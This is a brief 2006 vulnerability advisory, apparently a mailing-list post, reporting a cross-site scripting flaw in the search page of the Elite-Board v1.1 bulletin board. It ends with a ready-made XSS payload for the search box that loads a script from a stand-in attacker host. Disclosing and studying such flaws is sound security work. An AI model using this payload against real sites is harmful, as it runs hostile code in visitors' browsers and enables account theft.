Bulletin Board Elite-Board v.1.1

Thu, 25 May 2006 10:59:53 -0700 

Bulletin Board Elite-Board v.1.1


Homepage:

http://eng.e-board.net.ru/about/


Description:

Multipurpose multifunctional public bulletin board for your website. Easy to 
install and to use. Has all possible scripts functions of the same type and 
does not need additional modules and database. It works on any hosting.


Effected files:

search.html


Exploits & VUln:


Example of XSS attack by submitting malicious in search box:


'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT 
SRC=http://www.evilsite.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}

Reply via email to